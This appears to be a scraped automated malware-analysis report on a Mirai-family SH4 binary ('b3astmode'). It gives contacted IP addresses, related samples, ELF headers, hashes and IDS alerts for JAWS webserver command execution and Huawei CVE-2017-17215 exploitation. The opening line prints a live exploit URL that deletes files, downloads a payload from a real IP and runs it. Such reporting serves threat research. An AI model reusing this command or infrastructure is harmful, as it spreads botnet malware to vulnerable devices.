              http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jawstrue
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://schemas.xmlsoap.org/soap/encoding/b3astmode.sh4.elffalse
                high
                http://schemas.xmlsoap.org/soap/envelope/b3astmode.sh4.elffalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  52.169.198.174
                  unknownUnited States
                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                  200.68.173.236
                  unknownMexico
                  28403RadioMovilDipsaSAdeCVMXfalse
                  138.139.169.168
                  unknownUnited States
                  5972DNIC-ASBLK-05800-06055USfalse
                  85.238.117.200
                  unknownUkraine
                  6876TENET-ASUAfalse
                  197.116.147.57
                  unknownAlgeria
                  36947ALGTEL-ASDZfalse
                  159.184.133.125
                  unknownUnited States
                  34058LIFECELL-ASUAfalse
                  41.175.114.206
                  unknownSouth Africa
                  30969ZOL-ASGBfalse
                  197.93.144.158
                  unknownSouth Africa
                  10474OPTINETZAfalse
                  136.48.224.129
                  unknownUnited States
                  16591GOOGLE-FIBERUSfalse
                  197.152.177.200
                  unknownTanzania United Republic of
                  37133airtel-tz-asTZfalse
                  174.255.73.185
                  unknownUnited States
                  22394CELLCOUSfalse
                  160.34.204.111
                  unknownUnited States
                  7160NETDYNAMICSUSfalse
                  123.71.229.154
                  unknownChina
                  9394CTTNETChinaTieTongTelecommunicationsCorporationCNfalse
                  180.210.143.167
                  unknownBangladesh
                  23893BPL-BDBanglaPhoneLtdBDfalse
                  223.250.168.144
                  unknownChina
                  9812CNNIC-CN-COLNETOrientalCableNetworkCoLtdCNfalse
                  119.143.30.119
                  unknownChina
                  4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  223.119.37.133
                  unknownHong Kong
                  58807CMI-INT-ASChinaMobileInternationalLimitedHKfalse
                  142.150.47.194
                  unknownCanada
                  239UTORONTO-ASCAfalse
                  128.252.76.56
                  unknownUnited States
                  2552WUSTL-ASNUSfalse
                  190.167.128.250
                  unknownDominican Republic
                  6400CompaniaDominicanadeTelefonosSADOfalse
                  48.155.45.188
                  unknownUnited States
                  2686ATGS-MMD-ASUSfalse
                  190.27.46.7
                  unknownColombia
                  19429ETB-ColombiaCOfalse
                  143.46.128.90
                  unknownUnited States
                  1637DNIC-AS-01637USfalse
                  102.63.124.59
                  unknownEgypt
                  36992ETISALAT-MISREGfalse
                  168.252.48.171
                  unknownAustralia
                  7474OPTUSCOM-AS01-AUSingTelOptusPtyLtdAUfalse
                  62.181.10.177
                  unknownPoland
                  21244WARSAW-DATA-CENTER-ASPLfalse
                  114.189.89.42
                  unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                  197.96.173.30
                  unknownSouth Africa
                  3741ISZAfalse
                  90.11.56.42
                  unknownFrance
                  3215FranceTelecom-OrangeFRfalse
                  111.141.178.71
                  unknownChina
                  9394CTTNETChinaTieTongTelecommunicationsCorporationCNfalse
                  209.92.198.115
                  unknownUnited States
                  7029WINDSTREAMUSfalse
                  92.196.168.107
                  unknownGermany
                  20676PLUSNETDEfalse
                  97.21.61.30
                  unknownUnited States
                  22394CELLCOUSfalse
                  41.54.60.165
                  unknownSouth Africa
                  37168CELL-CZAfalse
                  157.252.160.121
                  unknownUnited States
                  3592TRINCOLL-ASUSfalse
                  45.185.59.98
                  unknownBrazil
                  269366WICONECTABANDALARGABRfalse
                  82.196.70.93
                  unknownRussian Federation
                  20632PETERSTAR-ASSaint-PetersburgRUfalse
                  129.159.23.127
                  unknownUnited States
                  14506ORCL-ASHBURN3USfalse
                  181.36.9.218
                  unknownDominican Republic
                  28118ALTICEDOMINICANASADOfalse
                  38.154.115.138
                  unknownUnited States
                  174COGENT-174USfalse
                  119.47.58.28
                  unknownJapan7679QTNETQTnetIncJPfalse
                  149.154.90.24
                  unknownItaly
                  57144ICCREA-ASITfalse
                  189.104.135.195
                  unknownBrazil
                  7738TelemarNorteLesteSABRfalse
                  160.165.110.212
                  unknownMorocco
                  6713IAM-ASMAfalse
                  94.114.47.120
                  unknownGermany
                  6830LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHoldingfalse
                  105.29.101.25
                  unknownMauritius
                  37100SEACOM-ASMUfalse
                  145.14.153.138
                  unknownNetherlands
                  204915AWEXUSfalse
                  193.203.140.207
                  unknownIreland
                  2110AS-BTIREBTIrelandwaspreviouslyknownasEsatNetEUnetfalse
                  181.66.18.220
                  unknownPeru
                  6147TelefonicadelPeruSAAPEfalse
                  186.121.193.246
                  unknownBolivia
                  26210AXSBoliviaSABOtrue
                  101.84.169.53
                  unknownChina
                  4812CHINANET-SH-APChinaTelecomGroupCNfalse
                  208.102.190.0
                  unknownUnited States
                  6181FUSE-NETUSfalse
                  12.88.161.142
                  unknownUnited States
                  7018ATT-INTERNET4USfalse
                  43.167.17.36
                  unknownJapan4249LILLY-ASUSfalse
                  223.248.22.246
                  unknownChina
                  9812CNNIC-CN-COLNETOrientalCableNetworkCoLtdCNfalse
                  156.247.76.135
                  unknownSeychelles
                  54600PEGTECHINCUSfalse
                  193.83.119.217
                  unknownAustria
                  1901EUNETAT-ASA1TelekomAustriaAGATfalse
                  95.159.210.200
                  unknownSlovenia
                  29276MOBITEL-GPRSSIfalse
                  42.66.153.17
                  unknownTaiwan; Republic of China (ROC)
                  17421EMOME-NETMobileBusinessGroupTWfalse
                  197.222.169.213
                  unknownEgypt
                  37069MOBINILEGfalse
                  82.129.229.104
                  unknownEgypt
                  24835RAYA-ASEGfalse
                  112.69.51.96
                  unknownJapan17511OPTAGEOPTAGEIncJPfalse
                  223.81.125.174
                  unknownChina
                  24444CMNET-V4SHANDONG-AS-APShandongMobileCommunicationCompanyfalse
                  223.61.171.79
                  unknownKorea Republic of
                  9644SKTELECOM-NET-ASSKTelecomKRfalse
                  9.116.2.73
                  unknownUnited States
                  3356LEVEL3USfalse
                  2.165.219.165
                  unknownGermany
                  3320DTAGInternetserviceprovideroperationsDEfalse
                  102.226.132.7
                  unknownunknown
                  36926CKL1-ASNKEfalse
                  14.198.113.196
                  unknownHong Kong
                  9269HKBN-AS-APHongKongBroadbandNetworkLtdHKfalse
                  173.164.130.190
                  unknownUnited States
                  7922COMCAST-7922USfalse
                  34.108.52.20
                  unknownUnited States
                  15169GOOGLEUSfalse
                  90.127.98.238
                  unknownFrance
                  3215FranceTelecom-OrangeFRfalse
                  110.161.156.11
                  unknownJapan9605DOCOMONTTDOCOMOINCJPfalse
                  137.20.72.23
                  unknownUnited States
                  13688PSEGUSfalse
                  32.193.220.10
                  unknownUnited States
                  2686ATGS-MMD-ASUSfalse
                  73.90.138.94
                  unknownUnited States
                  7922COMCAST-7922USfalse
                  78.12.63.254
                  unknownItaly
                  8612TISCALI-ITfalse
                  188.220.199.240
                  unknownUnited Kingdom
                  5607BSKYB-BROADBAND-ASGBfalse
                  157.78.133.77
                  unknownJapan4725ODNSoftBankMobileCorpJPfalse
                  122.93.4.79
                  unknownChina
                  9394CTTNETChinaTieTongTelecommunicationsCorporationCNfalse
                  129.4.213.114
                  unknownUnited States
                  1906NORTHROP-GRUMMANUSfalse
                  169.105.11.112
                  unknownUnited States
                  37611AfrihostZAfalse
                  108.68.0.148
                  unknownUnited States
                  7018ATT-INTERNET4USfalse
                  183.162.187.15
                  unknownChina
                  4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                  20.161.37.109
                  unknownUnited States
                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                  192.88.112.127
                  unknownUnited States
                  12195UNASSIGNEDfalse
                  157.215.45.54
                  unknownUnited States
                  4704SANNETRakutenMobileIncJPfalse
                  70.82.158.104
                  unknownCanada
                  5769VIDEOTRONCAfalse
                  147.3.223.242
                  unknownUnited States
                  10753LVLT-10753USfalse
                  106.157.153.92
                  unknownJapan2516KDDIKDDICORPORATIONJPfalse
                  77.171.116.50
                  unknownNetherlands
                  1136KPNKPNNationalEUfalse
                  62.44.42.118
                  unknownGermany
                  41707ASN-HSDG-DEfalse
                  119.193.74.162
                  unknownKorea Republic of
                  4766KIXS-AS-KRKoreaTelecomKRfalse
                  205.4.23.153
                  unknownUnited States
                  2914NTT-COMMUNICATIONS-2914USfalse
                  102.58.197.45
                  unknownEgypt
                  36992ETISALAT-MISREGfalse
                  83.126.38.44
                  unknownEuropean Union
                  44307MDSOLDEfalse
                  160.132.1.182
                  unknownUnited States
                  721DNIC-ASBLK-00721-00726USfalse
                  181.226.100.35
                  unknownChile
                  14117TelefonicadelSurSACLfalse
                  190.205.158.206
                  unknownVenezuela
                  8048CANTVServiciosVenezuelaVEfalse
                  190.108.205.227
                  unknownGuyana
                  52253E-NetworksIncGYfalse
                  189.238.52.119
                  unknownMexico
                  8151UninetSAdeCVMXfalse
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  41.175.114.20694.156.8.9-skid.arm-2024-07-23T17_40_08.elfGet hashmaliciousMirai, MoobotBrowse
                    Jw0RJGcmKwGet hashmaliciousMiraiBrowse
                      85.238.117.200qWRPhfG8ma.elfGet hashmaliciousUnknownBrowse
                        197.93.144.158VJaseV5ZDZ.elfGet hashmaliciousMirai, MoobotBrowse
                          ncJmBOetwDGet hashmaliciousMiraiBrowse
                            meihao.m68kGet hashmaliciousMiraiBrowse
                              197.152.177.200SecuriteInfo.com.Linux.Siggen.9999.3716.19012.elfGet hashmaliciousMiraiBrowse
                                vAZYIEQMP8.elfGet hashmaliciousMirai, MoobotBrowse
                                  5rdTM49ZpqGet hashmaliciousMiraiBrowse
                                    174.255.73.1858hzOAJeX2d.elfGet hashmaliciousMiraiBrowse
                                      197.116.147.57gmpsl.elfGet hashmaliciousMiraiBrowse
                                        Upc3E2ggQy.elfGet hashmaliciousMiraiBrowse
                                          x86Get hashmaliciousUnknownBrowse
                                            07xBxVsvEnGet hashmaliciousMiraiBrowse
                                              No context
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              RadioMovilDipsaSAdeCVMXb3astmode.x86.elfGet hashmaliciousMiraiBrowse
                                              • 200.68.213.36
                                              botx.sh4.elfGet hashmaliciousMiraiBrowse
                                              • 200.68.213.27
                                              h3G4uG7Kqi.elfGet hashmaliciousMiraiBrowse
                                              • 200.68.173.254
                                              botx.x86.elfGet hashmaliciousMiraiBrowse
                                              • 200.68.201.56
                                              uMqeVeoVI4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                              • 200.68.225.183
                                              irq1Get hashmaliciousTsunamiBrowse
                                              • 200.68.157.210
                                              2EDcea0dMU.elfGet hashmaliciousMiraiBrowse
                                              • 200.68.225.191
                                              hUNsPOU6yl.elfGet hashmaliciousMiraiBrowse
                                              • 200.68.178.1
                                              xd.x86.elfGet hashmaliciousMiraiBrowse
                                              • 200.68.225.183
                                              BfuJedn3HE.elfGet hashmaliciousMiraiBrowse
                                              • 200.68.213.41
                                              DNIC-ASBLK-05800-06055UShax.m68k.elfGet hashmaliciousMiraiBrowse
                                              • 131.77.229.230
                                              nshppc.elfGet hashmaliciousMiraiBrowse
                                              • 156.112.197.146
                                              la.bot.arm6.elfGet hashmaliciousMiraiBrowse
                                              • 128.44.88.217
                                              la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                                              • 143.81.14.150
                                              la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                              • 160.125.95.144
                                              la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                              • 160.125.96.77
                                              jew.arm.elfGet hashmaliciousUnknownBrowse
                                              • 160.146.98.115
                                              Private.txt.scr.exeGet hashmaliciousUnknownBrowse
                                              • 153.26.189.129
                                              jew.x86.elfGet hashmaliciousUnknownBrowse
                                              • 192.138.36.87
                                              arm5.elfGet hashmaliciousUnknownBrowse
                                              • 214.47.245.79
                                              MICROSOFT-CORP-MSN-AS-BLOCKUSb3astmode.ppc.elfGet hashmaliciousMiraiBrowse
                                              • 20.118.60.192
                                              jade.spc.elfGet hashmaliciousMiraiBrowse
                                              • 20.231.37.60
                                              original.emlGet hashmaliciousUnknownBrowse
                                              • 20.50.73.9
                                              ShareGate.24.12.1.msiGet hashmaliciousUnknownBrowse
                                              • 20.25.46.120
                                              loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                              • 20.243.21.75
                                              loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                              • 40.69.226.22
                                              loligang.arm.elfGet hashmaliciousMiraiBrowse
                                              • 40.71.196.18
                                              loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                              • 20.1.38.220
                                              2024 Tepa LLC RFP Proposal.docxGet hashmaliciousUnknownBrowse
                                              • 52.98.200.210
                                              https://docs.google.com/presentation/d/e/2PACX-1vRMxSBYgTIj7bH-OYJSKudpxaekmSD6B-b603kyy-2ygb7TXyfRQC-hU8fjYDSrrObCUBq88ZmRswwh/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                              • 40.99.70.194
                                              No context
                                              No context
                                              No created / dropped files found
                                              File type:ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
                                              Entropy (8bit):6.5960270427265195
                                              TrID:
                                              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                              File name:b3astmode.sh4.elf
                                              File size:46'116 bytes
                                              MD5:01a9ed49c3a4c3624baea4b58ea3a4b0
                                              SHA1:4cff2a0dee389eef0b1fd61478a9235f89627e0c
                                              SHA256:209f874b49d9c268531991859b9c996264c992d2ddcb77c67e84698a0eb410a0
                                              SHA512:059ff352d5ab8e997059bf997621838c20b40d0b2fce9cb556435e4f1ab362e3e3643b4c22044009f3ae9693ec279848290e1dbe7dc582160d2c5a864288b197
                                              SSDEEP:768:8BbYO9FeDmjkDCUVOhIFnLOCQo2NZlFCLpaF/:8tT+H1VOhIFSs2tFCLpa
                                              TLSH:BC237D73C8AA5ED4C6944974A228DE3A1733D418E2972EFA5A478676900FFDCF0093F5
                                              File Content Preview:.ELF..............*.......@.4...........4. ...(...............@...@.H...H.....................A...A.T...............Q.td............................././"O.n........#.*@........#.*@.....o&O.n...l..............................././.../.a"O.!...n...a.b("...q.

                                              ELF header

                                              Class:ELF32
                                              Data:2's complement, little endian
                                              Version:1 (current)
                                              Machine:<unknown>
                                              Version Number:0x1
                                              Type:EXEC (Executable file)
                                              OS/ABI:UNIX - System V
                                              ABI Version:0
                                              Entry Point Address:0x4001a0
                                              Flags:0x9
                                              ELF Header Size:52
                                              Program Header Offset:52
                                              Program Header Size:32
                                              Number of Program Headers:3
                                              Section Header Offset:45716
                                              Section Header Size:40
                                              Number of Section Headers:10
                                              Header String Table Index:9
                                              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                              NULL0x00x00x00x00x0000
                                              .initPROGBITS0x4000940x940x300x00x6AX004
                                              .textPROGBITS0x4000e00xe00x9ae00x00x6AX0032
                                              .finiPROGBITS0x409bc00x9bc00x240x00x6AX004
                                              .rodataPROGBITS0x409be40x9be40xd640x00x2A004
                                              .ctorsPROGBITS0x41b0000xb0000x80x00x3WA004
                                              .dtorsPROGBITS0x41b0080xb0080x80x00x3WA004
                                              .dataPROGBITS0x41b0140xb0140x2400x00x3WA004
                                              .bssNOBITS0x41b2540xb2540x59c0x00x3WA004
                                              .shstrtabSTRTAB0x00xb2540x3e0x00x0001
                                              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                              LOAD0x00x4000000x4000000xa9480xa9486.79870x5R E0x10000.init .text .fini .rodata
                                              LOAD0xb0000x41b0000x41b0000x2540x7f02.97360x6RW 0x10000.ctors .dtors .data .bss
                                              GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350662178.67.183.655501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350662178.67.183.655501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348464160.199.110.2237215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358752160.211.228.19837215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235573489.242.201.895501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235573489.242.201.895501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352332160.210.82.23737215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358422197.239.9.2737215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333502179.40.155.2445501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333502179.40.155.2445501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360232181.59.102.1655501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2360232181.59.102.1655501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339336198.57.128.375501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339336198.57.128.375501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346594157.236.92.2505501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2346594157.236.92.2505501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350970223.57.51.19837215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350914175.179.38.1855501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350444197.118.192.637215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333120216.49.130.1125501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333120216.49.130.1125501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344848156.167.231.1637215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347832102.192.235.2125501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2347832102.192.235.2125501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354612197.214.45.10737215TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350914175.179.38.1855501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234329824.55.141.465501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234329824.55.141.465501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333978128.241.95.2065501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333978128.241.95.2065501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343024102.195.193.1855501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343024102.195.193.1855501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2332810107.135.218.1215501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355654203.107.235.1595501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355654203.107.235.1595501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2332810107.135.218.1215501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354482221.207.6.2245501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2354482221.207.6.2245501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235535236.63.179.1205501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351306186.115.152.615501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360356145.65.214.875501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2360356145.65.214.875501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235535236.63.179.1205501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2351306186.115.152.615501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349742105.234.163.2337215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345296202.8.4.665501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345296202.8.4.665501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236094631.199.212.2085501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.236094631.199.212.2085501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337148106.237.241.2265501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2334248105.127.117.16137215TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337148106.237.241.2265501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233928287.3.243.745501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360900154.182.196.935501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2360900154.182.196.935501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233928287.3.243.745501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351722103.16.191.1335501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233666293.246.216.2275501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233666293.246.216.2275501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233792441.234.125.20837215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350394135.12.107.1755501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350394135.12.107.1755501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2351722103.16.191.1335501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360598153.50.5.1255501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2360598153.50.5.1255501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234966864.128.47.1045501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234966864.128.47.1045501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359222186.189.201.14637215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342102102.159.158.1337215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349584102.157.107.5637215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345138168.177.66.1165501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345138168.177.66.1165501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358414186.64.194.13737215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359330198.14.67.2155501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337872105.79.247.13937215TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359330198.14.67.2155501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348168197.148.138.14337215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233913032.226.152.1815501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358030156.168.94.737215TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233913032.226.152.1815501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357982102.197.44.8137215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352016156.134.12.1737215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340490104.129.67.695501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2340490104.129.67.695501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342298156.91.0.21137215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338862186.169.115.18537215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334804219.54.160.745501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2334804219.54.160.745501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233455635.205.63.165501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233455635.205.63.165501TCP
